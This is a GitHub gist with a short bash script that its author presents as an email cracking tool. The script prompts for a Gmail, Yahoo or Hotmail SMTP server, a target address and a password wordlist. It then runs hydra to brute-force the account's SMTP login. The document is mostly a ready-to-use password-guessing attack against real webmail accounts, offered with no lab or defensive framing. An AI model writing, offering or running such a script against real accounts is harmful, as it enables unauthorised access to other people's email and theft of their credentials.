Skip to content

Instantly share code, notes, and snippets.

@elijahcruz12
Created April 3, 2017 17:09
Show Gist options
  • Save elijahcruz12/1a2d939795df8ed63b62c648aa4d0891 to your computer and use it in GitHub Desktop.
Save elijahcruz12/1a2d939795df8ed63b62c648aa4d0891 to your computer and use it in GitHub Desktop.
#! /bin/bash
echo Simple Email Cracking Script in bash
echo Written By: Elijah Cruz github @elijahcruz12
sleep 1s
echo NOTE: Make sure you have a .txt wordlist AND hydra installed!
echo hydra: https://github.com/vanhauser-thc/thc-hydra
sleep 1s
echo Some email providers have brute force protection, so beware!
sleep 1s
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment